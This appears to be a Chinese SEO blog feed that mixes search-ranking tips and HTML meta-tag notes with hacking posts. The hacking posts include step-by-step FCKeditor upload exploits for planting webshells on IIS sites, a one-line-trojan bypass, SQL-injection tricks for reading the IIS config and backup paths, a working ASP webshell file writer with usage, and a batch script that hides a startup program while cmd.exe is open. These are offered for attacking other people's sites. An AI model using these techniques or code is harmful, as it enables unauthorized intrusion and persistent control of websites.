阿易SEO优化

批处理：监控进程与操作

Thu, 09 Feb 2012 03:51:35 +0000

原理就是监控cmd.exe,如果发现进程中出现cmd.exe,表明CMD已经启动。此时就删除某某东西或者操作其他东西等。当cmd.exe不再了，则又操作其他东西等。
源代码如下:
路径请随意修改

======================================================================
@echo off :
:star
Rem 10秒钟检查一次
ping 127.1 -n 10 >nul 2>nul
Rem 进程中查找是否有cmd进程
tasklist|findstr /i “cmd.exe”
Rem 如果没有cmd.exe进程继续跳转到star处继续监控，如果有cmd.exe则跳转到del处删除
if errorlevel 1 (goto star) else (goto del)
Rem 删除自启动
:del
del “C:\Program Files\ok1.exe ”
Rem 继续监控cmd.exe进程
:findagain
ping 127.1 -n 20 >nul 2>nul
tasklist|findstr /i “cmd.exe”

Rem 如果cmd.exe不在了，则跳到not处复制启动项回来,如果还在继续跳到findagain继续查找
if errorlevel 1 (goto not) else (goto findagain)
:not
copy /n “C:\Program Files\ok.exe” “C:\Program Files\ok1.exe”
======================================================================

会影响你谷歌排名的因素，信者得救！

Sun, 05 Feb 2012 13:10:50 +0000

关键词、内外部链接、流量、体验、内容等方面详细列举了网站在google搜索引擎排名的影响因素

Google排名有利因素（一）

关键词：
1.url中的关键词（第一和第二个字是最有价值的……）
2.域名中的关键词（英文网站的优势）
（Head部分）
3.Title tag中的关键词（10-50个字符，不包含特殊字符）
4.Description tag中的关键词（小于200个字符，这个参数现在Google已不再把它作为重要参数，但仍经常使用）
5.Keywords tag中的关键词（小于10个字，单个关键词必须在页面Body部分出现2次以上才有效，否则可能会被评估为Spam而受到处罚，Google官方曾说明说不再依据此参数评价，但其实仍在使用）

(Body部分)
6.关键词在Body文字部分的密度（5 – 20% – (all keywords/ total words)）
7.单个关键词密度（1 – 6% – (each keyword/ total words)）
8.在H1、H2、H3中的关键词（使用H1、H2、H3字体）
9.关键词字体尺寸（使用黑体、粗体、斜体……）
10.关键词接近度（2个关键词之间邻近的是最佳）
11.关键词短语顺序

（其他部分）
12.关键词在Alt文字中（图形中的Alt属性）
13.关键词在外部站点链接中（锚文本）

导航－内部链接部分：
14.内部页面的关键词（链接页面应该包含关键词）
15.所有内部链接必须是有效的
16.结构树（任何页面不超过4层深度链接）
17.低级页面之间适当的链接

导航－外部链接部分：

18.外部页面的关键词（Google的专利链接须指向优秀站点，不要链接frame）
19.外部链接的锚文本（Google的专利应该在此上展开主题和叙述）
20.链接稳定性（Google的专利避免链接随时变换）
21.所有外部链接是有效的
22.少于100个外部链接（Google官方称限制100个，实际容许2－3次2000个）

Google排名有利因素（二）

页面上的其他因素：
24.域名等级（.edu是最高等级，其次是.org，而.com由于包含很多spam信息，所以会受到Google的严格审查）
25.文件尺寸（页面尺寸绝对不要超过100K，小于40K的为最佳）
26.URL中的连字符（1个或2个是最佳的，4个以上将被认为是spam，10个很可能被降级）
27.页面更新率（Google专利对于新闻、零售、拍卖等站点更新越快越好）
28.页面数量的更新率（Google专利老页面与新页面的比值）
29.链接的的更新率（Google专利尚未能分析）
30.更新频率（更新频率＝蜘蛛的抓取频率）
31.页面主题
32.关键词衍生…..
33.语义关联（同义词等…）
34.潜在的语义索引
35.URL长度（尽可能的小，在IE中只允许2000个字符以内，最好控制在100字符以内）
36.站点大小（Google认为站点越大说明更大的资金支持、更好的组织、更好的架构，因此它会是好的站点）
37.站点年龄（Google专利越老越好）
38.页面的年龄与站点上其他页面的年龄

Google排名不利因素（三）

39.在图像的form中有文字描述，但Body中没真正的文字描述；
40.镜像站点
41.过度优化
42.链接一个坏站点（不要链接frame….，定期检查每个外部链接站点在Google的状态）
43.重定向或刷新metatags（除非用户点击，否则不要自动跳转页面）
44.不要使用一些不文明的词汇
45.毒药单词
46.过多的横向链接（在你的WEB服务器中有多个站点，它们的横向链接会被视为无效的投票）
47.图片、文字的反盗链
48.关键词重复填充（降级处理）
49.关键词稀释（页面存在过多的非相关关键词，将会降低你真实内容的重要性）
50.页面内容编辑会降低一致性（Google专利 Google定期会对老的cache与新的cache进行比对，如果发现关键词、主题变化了，将会影响它的评价，这是Google针对SEO的有效工具）
51.内容改变频率（Google专利过于频繁是不利的）
52.锚文本更新率（Google专利过于频繁是不利的）
53.动态页面（这是搜索引擎的缺陷，可采用缩短URL,减少变量等办法，最好不要使用动态页面）
54.过多的JS代码（不要使用重定向和隐藏链接功能）
55.Flash页面（搜索引擎的蜘蛛是不能抓取flash内容的，如果要用flash页面，须同时有一个静态入口页面）
56.使用frame
57.Robot中设置了“no index”的tag
58.单个像素的链接（会被认为是一个鬼祟的链接）
59.不可见的文字（文字与背景色相同，页面上不可见，但能被蜘蛛检索到）
60.门页（Google专利）
61.内容重复（Google通常选一个最老的推送到前面，把其他的推送下去）
62.HTML代码需符合W3C标准

Google排名有利因素（非页面）（四）

反向链接：
63.PR（基于指向站点的链接数量和质量）
64.总的反向链接数（link:www.xxx.com Google axy linkdomain:www.xxx.com Yahoo….）
65.反向链接页面PR>4
66.链接流行度（Google专利推进太快会被认为是作弊）

每个反向链接：
67.每个涉及页面的PR
68.链接到你站点的锚文本（Google炸弹）
69.链接时间（Google专利越久越好）
70.锚文本改变频率（Google专利频率越高越不好）
71.涉及页面的流行度
72.涉及页面的外部链接数（越少越好，证明你的重要性）
73.涉及页面链接的位置（在HTML代码中最好）
74.涉及页面的关键词密度（针对搜索关键词）
75.涉及页面的title
76.链接来自”行家”网站（Google专利极大的推进）
77.涉及页面主题相同

目录：
78.被DMOZ收录（巨大推进，因为Google的目录是从DMOZ获取的，一般要28个月才可能被收录）
79.DMOZ分类（据说综合类和地理类主题最适合收录）
80在Yahoo目录中收录（巨大推进，但需要每年支付299美金）
81.在LookSmart中收录
82.被inktomi收录
83.被其他目录类网站收录
84.特大站点的引入链接
85.站点历史悠久表明越稳定（对新的内容至少可以产生1－3周的推动）
86.站点目录树
87.站点地图（关键词在锚文本中体现）

用户行为：
88.页面流量（Google专利 visters数量及趋势）
89.页面选择率（Google专利经常被点击的页面数量）
90.在页面上花费的时间（Google专利相对长的时间表示对内容的认可）
91.用户是否将此页面加入书签（Google专利）
92.用户删除此书签（Google专利）
93.用户离开后去了哪儿（返回？点击链接？….）
94.用户使用的关键词
95.在此域名上花费的时间

网站主行为：
96.域名注册时间（5年以上是一个有价值的）
97.是否加入合法联盟（拒绝spam，版权保护等）

Google排名不利因素（非页面）（五）

98.流量购买（这些流量产生低的转化率，甚至是0转化率，被认为是来自坏的外部链接）
99.链接分析（老的链接有价值，新的链接暂时没价值，用来阻止快速更改）
100.零外部链接
101.购买链接（Google专利）
102.站点排名优先（Google专利）
103.隐藏（给Google蜘蛛读取的是一个特定的页面，真正显示的是另外的页面）
104.来自坏站点的链接
105.域名偷窃（非法行为，将会被剔除）
106.如果同一IP向Google发送100次同一请求，可能将会被BAN这个IP
107.服务器可靠性>99.9%（注意你的Google更新时间，尽量不在此时间维护）
108.页面被剔除来自大的站点
109.排名处理由于竞争对手的侵害

Fckeditor的版本外部提交

Tue, 20 Dec 2011 11:31:15 +0000

首先,你得确定下Fckeditor的版本。

/FCKeditor/editor/dialog/fck_about.html

其次,你确定下以下几个上传页面是否真的被删除了呢?

/FCKeditor/editor/filemanager/browser/default/browser.html

/FCKeditor/editor/filemanager/browser/default/connectors/test.html

/FCKeditor/editor/filemanager/upload/test.html

/FCKeditor/editor/filemanager/connectors/test.html

/FCKeditor/editor/filemanager/connectors/uploadtest.html

嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

/fckeditor/editor/filemanager/connectors/asp/connector.asp

/fckeditor/editor/filemanager/connectors/php/connector.php

如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例

1.查看Media目录下的文件：

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

红色Media可以更改为File或者image,相应的进入文件或者图片目录下

2.利用iis解析漏洞创建1.asp特殊目录

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

红色的是对应的Media目录,蓝色的是特殊目录名字

3.构建表单,上传webshell到特殊目录

将以上代表保存为HTML格式,http://www.xxx.com修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。

最后的一些提示

上传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现方式是一个上传好了的文件名,全路径必须你自己组合,我相信你是会的。如果访问之后发现无法访问,试着上传一张正确的图片,再进行访问,如果访问成功,说明管理员已经补上了IIS路径解析漏洞,那你得另找出路了。

封你IP,封你IP就是这么简单！

Tue, 20 Dec 2011 11:26:29 +0000

例子：

公网：1.1.1.1

内网：10.0.0.1

要封的IP：8.8.8.8

route add 8.8.8.8 10.0.0.1 -p 封掉，-p 是永久路由。

火狐删除栏目下拉条网站地址

Tue, 20 Dec 2011 11:25:01 +0000

用360清空也不行？删除缓存也不行？

那就选择性清理地址栏：在地址栏下拉列表中Shift+Del删除不要的。

“NetoverCMS” 漏洞

Thu, 10 Nov 2011 05:42:37 +0000

“NetoverCMS” 漏洞后台存在无验证加用户或者浏览管理信息！

转载：fckeditor漏洞再次突破影响版本asp,aspx

Fri, 28 Oct 2011 07:06:04 +0000

经测试，此方法通杀asp、aspx版本，不适用于php。
之前很多的方法，诸如上传*.asp等类型文件；创建*.asp等目录……
今天遇到一个fck编辑器，跟之前很多次一样，以上方法均无果。
创建*.asp；*.php等目录无果；上传*.asp;.jpg等文件无果；神马cer之类的就不说了。
以下是误打误撞的方法，不知道黑扩们发了没。
利用过程：
1、Current Folder处填写*.asp等目录文件，随便填即可；点击Create Folder创建目录；目录名随便填。

2、上传jpg格式的一句话木马。

3、利用完毕，直接访问一句话木马地址即可，菜刀链接。

外贸SEO优化的外链上链接总结

Wed, 19 Oct 2011 12:34:19 +0000

经过之前的几个网站测试，发现引擎是根据你链接的词来定位你的关键字排名的。你的友链都链接到那个页面，那么被链接的页面权重也就很高，排名也很不错。

如:一个网站定义关键字为企业SEO。那么如果它外链只链接企业SEO。往往引擎是不那轻易让它获得排名的。那么我们就要投放一个链接大关键词的外链。这样一来引擎就知道你的链接方向。当你的大关键字词做了一定程度以后，还是没什么排名或者订单。那么你就需要定位关键字类型了。继续投放一些长尾词，这样一来，长尾词就有可能获得不错的排名哦。

今天文章记录到着，下期讨论话题: 如果在一个页面投放N个以上自己网站的链接来获取排名

SA注射点找不到目录，你还可以这样。

Fri, 07 Oct 2011 08:54:46 +0000

type c:\windows\system32\inetsrv\MetaBase.xml // 直接读IIS配置文件,你懂得。

select 1 where 1=(select top 1 physical_device_name from msdb..backupmediafamily order by media_set_id desc) - // 查询备份是否成功,一般在不知道目录情况下有效果。如替换SU 或者启动项等。

如果值不是你备份的路径，表示备份失败。

BS小马

<%
On Error Resume Next
set gl=server.CreateObJeCt(“Adodb.Stream”)
gl.Open
gl.Type=2
gl.CharSet=”gb2312″
gl.writetext request(“code”)
gl.SaveToFile server.mappath(request(“path”)),2
gl.Close
set gl=nothing
response.redirect request(“path”)
%>
用法：?code=xxx&path=x.asp

转载：HTML文档标签的详解

Tue, 04 Oct 2011 08:03:56 +0000

HTML文档中小meta的大作用
   meta是用来在HTML文档中模拟HTTP协议的响应头报文。meta 标签用于网页的＜head＞与＜/head＞中，meta 标签的用处很多。meta 的属性有两种：name和http-equiv。name属性主要用于描述网页，对应于content（网页内容），以便于搜索引擎机器人查找、分类（目前几乎所有的搜索引擎都使用网上机器人自动查找meta值来给网页分类）。这其中最重要的是description（站点在搜索引擎上的描述）和 keywords（分类关键词），所以应该给每页加一个meta值。比较常用的有以下几个：
name 属性
＜meta name=”Generator” contect=”"＞用以说明生成工具（如Microsoft FrontPage 4.0）等；
            ＜meta name=”KEYWords” contect=”"＞向搜索引擎说明你的网页的关键词；
            ＜meta name=”DEscription” contect=”"＞告诉搜索引擎你的站点的主要内容；
            ＜meta name=”Author” contect=”你的姓名”＞告诉搜索引擎你的站点的制作的作者；
            ＜meta name=”Robots” contect=”all|none|index|noindex|follow|nofollow”＞
其中的属性说明如下：
设定为all：文件将被检索，且页面上的链接可以被查询；
               设定为none：文件将不被检索，且页面上的链接不可以被查询；
               设定为index：文件将被检索；
               设定为follow：页面上的链接可以被查询；
               设定为noindex：文件将不被检索，但页面上的链接可以被查询；
               设定为nofollow：文件将不被检索，页面上的链接可以被查询。
http-equiv属性
＜meta http-equiv=”Content-Type” contect=”text/html”;charset=gb_2312-80″＞和＜meta http-equiv=”Content-Language” contect=”zh-CN”＞用以说明主页制作所使用的文字以及语言；又如英文是ISO-8859-1字符集，还有BIG5、utf-8、shift-Jis、Euc、Koi8-2等字符集；
＜meta http-equiv=”Refresh” contect=”n;url=http://yourlink” ＞定时让网页在指定的时间n内，跳转到页面；
＜meta http-equiv=”Expires” contect=”Mon,12 May 2001 00:20:00 GMT”＞可以用于设定网页的到期时间，一旦过期则必须到服务器上重新调用。需要注意的是必须使用GMT时间格式；
＜meta http-equiv=”Pragma” contect=”no-cache”＞是用于设定禁止浏览器从本地机的缓存中调阅页面内容，设定后一旦离开网页就无法从Cache中再调出；
＜meta http-equiv=”set-cookie” contect=”Mon,12 May 2001 00:20:00 GMT”＞cookie设定，如果网页过期，存盘的cookie将被删除。需要注意的也是必须使用GMT时间格式；
＜meta http-equiv=”Pics-label” contect=”"＞网页等级评定，在IE的internet选项中有一项内容设置，可以防止浏览一些受限制的网站，而网站的限制级别就是通过meta属性来设置的；
＜meta http-equiv=”windows-Target” contect=”_top”＞强制页面在当前窗口中以独立页面显示，可以防止自己的网页被别人当作一个frame页调用；
＜meta http-equiv=”Page-Enter” contect=”revealTrans(duration=10,transtion=50)”＞和＜meta http-equiv=”Page-Exit”contect=”revealTrans(duration=20，transtion=6)”＞设定进入和离开页面时的特殊效果，这个功能即FrontPage中的“格式/网页过渡”，不过所加的页面不能够是一个frame页面。